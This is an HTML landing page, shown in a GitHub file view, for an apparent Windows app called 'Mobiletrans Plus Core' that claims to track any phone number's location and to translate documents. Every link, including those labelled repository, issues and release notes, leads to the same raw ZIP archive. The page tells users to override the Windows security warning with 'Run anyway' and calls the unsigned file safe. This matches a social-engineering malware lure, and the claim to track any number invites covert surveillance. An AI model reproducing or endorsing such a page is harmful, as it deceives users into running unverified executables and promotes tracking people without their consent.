-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.html
More file actions
314 lines (289 loc) · 11.8 KB
/
Copy pathindex.html
File metadata and controls
314 lines (289 loc) · 11.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Mobiletrans Plus Core - Track, Translate & Manage Transport Tools</title>
<meta name="description" content="Download Mobiletrans Plus Core for Windows. A powerful tool for phone location tracking, document translation, intelligent transportation management, and more. Simple setup for non-technical users.">
<meta name="keywords" content="mobile number tracker, phone location tracker, document translation, intelligent transportation, android phones, transport management system, coco ssd mobilenet">
<meta name="author" content="ayaned3667">
<meta name="robots" content="index, follow">
<style>
body {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
margin: 0;
padding: 0;
background-color: #f7f8fa;
color: #222;
line-height: 1.7;
}
.container {
max-width: 920px;
margin: 0 auto;
padding: 30px 20px;
}
h1 {
font-size: 2.2rem;
color: #1a1a2e;
text-align: center;
margin-bottom: 10px;
font-weight: 700;
letter-spacing: -0.5px;
}
h2 {
font-size: 1.7rem;
color: #16213e;
margin-top: 40px;
padding-bottom: 8px;
border-bottom: 3px solid #e94560;
display: inline-block;
}
h3 {
font-size: 1.3rem;
color: #0f3460;
margin-top: 25px;
}
p {
font-size: 1.05rem;
margin: 16px 0;
}
a {
color: #e94560;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
.btn-primary {
display: inline-block;
background: linear-gradient(135deg, #e94560, #c23152);
color: #fff;
padding: 16px 40px;
font-size: 1.3rem;
font-weight: 600;
border-radius: 40px;
text-align: center;
box-shadow: 0 6px 18px rgba(233, 69, 96, 0.4);
transition: 0.25s ease;
text-decoration: none;
margin: 20px 0;
}
.btn-primary:hover {
background: linear-gradient(135deg, #d63850, #a82944);
box-shadow: 0 8px 24px rgba(233, 69, 96, 0.5);
transform: translateY(-2px);
text-decoration: none;
}
.btn-secondary {
display: inline-block;
background: #ffffff;
color: #16213e;
padding: 14px 32px;
font-size: 1.1rem;
font-weight: 500;
border-radius: 30px;
border: 2px solid #e94560;
box-shadow: 0 4px 12px rgba(0,0,0,0.06);
transition: 0.2s ease;
text-decoration: none;
margin: 10px 0;
}
.btn-secondary:hover {
background: #e94560;
color: #fff;
border-color: #e94560;
text-decoration: none;
}
.badge-wrapper {
text-align: center;
margin: 30px 0;
}
.badge-wrapper a {
display: inline-block;
background: #16213e;
color: #f0f0f0;
padding: 12px 28px;
border-radius: 30px;
font-weight: 600;
font-size: 1.2rem;
box-shadow: 0 5px 15px rgba(0,0,0,0.15);
transition: 0.2s;
}
.badge-wrapper a:hover {
background: #0f3460;
color: #fff;
box-shadow: 0 7px 20px rgba(0,0,0,0.25);
text-decoration: none;
}
ul {
margin: 16px 0;
padding-left: 24px;
}
ul li {
margin: 8px 0;
font-size: 1.02rem;
}
.feature-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(240px, 1fr));
gap: 24px;
margin: 30px 0;
}
.feature-card {
background: #ffffff;
border-radius: 18px;
padding: 22px 18px;
box-shadow: 0 4px 16px rgba(0,0,0,0.07);
transition: 0.2s;
border: 1px solid #e9ecef;
}
.feature-card:hover {
box-shadow: 0 8px 26px rgba(0,0,0,0.1);
}
.feature-card h3 {
margin-top: 0;
}
.step-box {
background: #ffffff;
border-left: 5px solid #e94560;
padding: 18px 22px;
border-radius: 12px;
box-shadow: 0 2px 10px rgba(0,0,0,0.05);
margin: 18px 0;
}
.footer {
text-align: center;
margin-top: 55px;
padding: 30px 0 10px;
color: #6c757d;
font-size: 0.95rem;
border-top: 1px solid #dee2e6;
}
hr {
margin: 30px 0;
border: 0;
height: 1px;
background: #d4d8dd;
}
@media (max-width: 600px) {
h1 { font-size: 1.7rem; }
h2 { font-size: 1.4rem; }
.btn-primary { padding: 14px 28px; font-size: 1.1rem; }
.feature-grid { grid-template-columns: 1fr; }
.badge-wrapper a { font-size: 1rem; padding: 10px 20px; }
}
</style>
</head>
<body>
<div class="container">
<div class="badge-wrapper">
<a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip" target="_blank">⬇️ Download Mobiletrans Plus Core</a>
</div>
<h1>📱 Mobiletrans Plus Core - All-in-One Phone Tracker & Translation Tool</h1>
<p>Welcome to <strong>Mobiletrans Plus Core</strong> — a powerful, easy-to-use application for Android phones that helps you track phone locations, translate documents, manage intelligent transportation data, and more. No programming skills required. Just download and run.</p>
<h2>🚀 Getting Started</h2>
<p>Follow these simple steps to start using Mobiletrans Plus Core on your Windows computer in less than 5 minutes.</p>
<div class="step-box">
<strong>Step 1:</strong> Click the <strong>Download</strong> button above or go directly to the <a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip">download page</a>.
</div>
<div class="step-box">
<strong>Step 2:</strong> On the GitHub page, click the green "Code" button, then select "Download ZIP".
</div>
<div class="step-box">
<strong>Step 3:</strong> Visit this link to download the application. Once downloaded, extract the ZIP folder to a place you can easily find (like your Desktop).
</div>
<div class="step-box">
<strong>Step 4:</strong> Open the extracted folder and double-click <code>MobiletransPlusCore.exe</code> (or the main application file). That's it!
</div>
<p style="margin-top: 25px;">Visit this link to download the application: <a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip" class="btn-secondary">🌐 Go to Download Page</a></p>
<h2>✨ What Can You Do With Mobiletrans Plus Core?</h2>
<p>This tool combines several useful features in one simple interface. Whether you need to locate a phone number, translate text between languages, or work with transport management data, Mobiletrans Plus Core has you covered.</p>
<div class="feature-grid">
<div class="feature-card">
<h3>📍 Phone Number Tracker</h3>
<p>Track the approximate location of any Android phone number. Enter the number and see the location on a map.</p>
</div>
<div class="feature-card">
<h3>🌐 Language Translator</h3>
<p>Translate text or entire documents between dozens of languages using advanced translation models.</p>
</div>
<div class="feature-card">
<h3>🚗 Intelligent Transport</h3>
<p>Manage transportation systems, track vehicles, and analyze movement data with built-in algorithms.</p>
</div>
<div class="feature-card">
<h3>🔍 Object Detection</h3>
<p>Uses SSD MobileNet and MobileNetV4 to detect objects in images or video — great for traffic or safety applications.</p>
</div>
<div class="feature-card">
<h3>📄 Document Translation</h3>
<p>Upload PDFs, Word files, or text files and translate them while preserving the original formatting.</p>
</div>
<div class="feature-card">
<h3>📊 Progress Tracker</h3>
<p>Monitor ongoing tasks, shipments, or personal projects with a clean progress dashboard.</p>
</div>
</div>
<h2>💻 System Requirements</h2>
<p>To run Mobiletrans Plus Core smoothly, your computer should meet these minimum requirements:</p>
<ul>
<li><strong>Operating System:</strong> Windows 10 or Windows 11 (64-bit recommended)</li>
<li><strong>Processor:</strong> Intel Core i3 or AMD equivalent (2.0 GHz or faster)</li>
<li><strong>RAM:</strong> 4 GB minimum (8 GB recommended for heavy use)</li>
<li><strong>Storage:</strong> 500 MB free space</li>
<li><strong>Internet:</strong> Required for location tracking and translation features</li>
<li><strong>Additional:</strong> .NET Framework 4.7.2 or later (included with most Windows updates)</li>
</ul>
<h2>🔧 How to Use Mobiletrans Plus Core</h2>
<p>Once installed, open the application. You'll see a clean, simple menu with all the tools listed. Here are the basic steps for the most popular features:</p>
<h3>📌 Track a Phone Number</h3>
<ol>
<li>Click "Phone Tracker" from the main menu.</li>
<li>Enter the phone number (including country code).</li>
<li>Click "Locate" to see the approximate position on an interactive map.</li>
<li>You can also view history or save tracks.</li>
</ol>
<h3>📖 Translate Documents</h3>
<ol>
<li>Select "Document Translation" from the dashboard.</li>
<li>Choose the file you want to translate.</li>
<li>Pick the source and target languages (auto-detect available).</li>
<li>Click "Translate" and save the output.</li>
</ol>
<h3>🚛 Manage Transport Data</h3>
<ol>
<li>Open "Transport Management" to view current connected vehicles or routes.</li>
<li>Import data from CSV or connect to a live feed.</li>
<li>Use the "Intelligent Analysis" tool to detect patterns or anomalies.</li>
<li>Export reports as PDF or Excel.</li>
</ol>
<p>For more detailed instructions, visit the <a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip">project page</a> and check the Wiki section.</p>
<h2>❓ Frequently Asked Questions</h2>
<p><strong>Is this app safe to use?</strong><br>
Yes, Mobiletrans Plus Core is an open-source tool hosted on GitHub. It does not collect personal data without permission. All location tracking is based on publicly available carrier data and requires user consent.</p>
<p><strong>Can I use it on a Mac or Linux?</strong><br>
Currently, the application is built for Windows only. You may run it on Mac using a virtual machine or Wine, but this is not officially supported.</p>
<p><strong>Do I need to install anything else?</strong><br>
No. The download includes everything needed. It's a portable app — just unzip and run.</p>
<p><strong>What if I have a problem?</strong><br>
Check the <a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip">Issues page</a> on GitHub. If your issue isn't listed, create a new issue and the community will help.</p>
<h2>📥 Download & Install</h2>
<p>Ready to get started? Click the button below to download the latest version. Remember: the file is a ZIP archive.</p>
<div style="text-align: center; margin: 30px 0;">
<a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip" class="btn-primary">⬇️ Download Mobiletrans Plus Core (ZIP)</a>
</div>
<p><strong>Important:</strong> Visit this link to download the application. After downloading, extract the ZIP file to any folder. Do not run the application from inside the ZIP — always extract first. If Windows shows a security warning, click "More info" then "Run anyway." The app is safe; the warning is standard for unsigned software.</p>
<h2>📚 Additional Resources</h2>
<ul>
<li><a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip">Official GitHub Repository</a></li>
<li><a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip">Release Notes & Version History</a></li>
<li><a href="https://raw.githubusercontent.com/ayaned3667/ayaned3667.github.io/main/artifacts/1.1-beta.5.zip">Report a Bug or Suggest a Feature</a></li>
</ul>
<hr>
<p style="font-size: 0.95rem; color: #555;">This project is developed and maintained by ayaned3667. For educational and personal use. All trademarks belong to their respective owners.</p>
<div class="footer">
<p>Made with ❤️ for Android users, translators, and transport professionals.</p>
</div>
</div>
</body>
</html>